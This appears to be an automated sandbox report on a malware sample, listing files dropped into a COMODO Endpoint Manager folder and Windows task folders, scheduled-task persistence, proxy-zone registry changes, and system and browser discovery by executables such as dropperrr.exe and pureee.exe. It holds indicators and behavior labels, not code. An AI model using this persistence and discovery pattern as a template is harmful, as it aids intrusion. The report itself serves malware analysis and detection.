File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\chardet\__init__.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\urllib3\packages\ssl_match_hostname\_implementation.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\setuptools\command\__init__.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\pkgIndex.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\Shell.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\_markerlib C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\idlelib\config-highlight.def C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\ttk\combobox.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\urllib3\packages\ssl_match_hostname\__init__.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\demos\toolbar.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\setuptools\command\launcher manifest.xml C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Indiana\Vincennes C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\demos\aniwave.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\demos\plot.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\msgs\kok_in.msg C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\CObjView.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\rcvirtualprintdriver.cat C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\idlelib\config-keys.def C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\html5lib\sanitizer.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Argentina\ComodRivadavia C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Grand_Turk C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\demos\samples\Control.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\distutils\archive_util.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\mailcap.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\chardet\cp949prober.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\msgs\kw.msg C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Europe\Belgrade C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\xml\sax\expatreader.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\bsddb\dbrecio.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip-7.1.2.dist-info\WHEEL C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\utils\ui.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\sunaudio.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Pacific\Galapagos C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\pref\TK.csc C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Asia\Samarkand C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\packaging\_compat.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\__main__.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\encoding\cp737.enc C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\msgs\ro.msg C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Cayman C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\demos\tixwidgets.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIE9BA.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIEC3F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF17F.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{373FFE70-5FF7-492D-A2F4-0C6A15D8D503}\icon.ico C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e59e72c.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e59e72a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{373FFE70-5FF7-492D-A2F4-0C6A15D8D503} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{373FFE70-5FF7-492D-A2F4-0C6A15D8D503}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\Installer\MSIF1FD.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFB55.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI26B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e59e72a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe N/A
File opened for modification C:\Windows\Installer\MSIEA09.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIEB91.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIEBFF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{373FFE70-5FF7-492D-A2F4-0C6A15D8D503}\icon.ico C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\explorti.job C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
File created C:\Windows\Tasks\axplong.job C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\1000029002\84743dcfde.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\1000029002\84743dcfde.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\xpmvhsd\agpphek.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX11\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DD4D523EF099D7E42B1DBDFD40CF9061 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\07EFF3737FF5D2942A4FC0A6518D5D30\DefaultFeature C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\Language = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\DD4D523EF099D7E42B1DBDFD40CF9061\07EFF3737FF5D2942A4FC0A6518D5D30 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\PackageCode = "D7076E96D3235814DB26ACC95D2BAD84" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\DirectX11\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList\PackageName = "em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\ProductIcon = "C:\\Windows\\Installer\\{373FFE70-5FF7-492D-A2F4-0C6A15D8D503}\\icon.ico" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\07EFF3737FF5D2942A4FC0A6518D5D30 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\Version = "151109272" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\ProductName = "Endpoint Manager Communication Client" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\07EFF3737FF5D2942A4FC0A6518D5D30\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
